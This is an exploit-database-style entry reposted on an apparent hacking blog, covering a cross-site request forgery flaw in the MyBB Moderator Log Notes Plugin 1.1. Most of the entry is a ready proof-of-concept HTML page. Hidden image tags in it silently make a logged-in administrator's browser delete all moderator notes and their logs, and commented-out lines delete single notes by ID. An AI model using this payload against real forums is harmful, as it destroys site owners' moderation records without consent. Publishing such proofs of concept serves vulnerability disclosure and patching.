Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863107885

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery
# Date: 2018-05-17
# Author: 0xB9
# Twitter: @0xB9Sec
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1105
# Version: 1.1
# Tested on: Ubuntu 18.04

# 1. Description:
# The plugin allows moderators to save notes and display them in a list in the modCP.
# The CSRF allows an attacker to remotely delete all mod notes and mod note logs 
# in the modCP & ACP.

# 2. Proof of Concept:

<html>
	<body>
		<-- Deletes mod note logs -->
		<img style="display:none" src="http://localhost/mybb15/admin/index.php?module=tools-modnoteslog&action=dal" alt="">
		<-- Deletes mod notes -->
		<img style="display:none" src="http://localhost/mybb15/admin/index.php?module=tools-modnoteslog&action=dmn" alt="">
		
		<!-- You can also delete notes individually by the nid (note ID)
		<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=3" alt="">
		<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=2" alt="">
		<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=1" alt="">
		-->
	</body>
</html>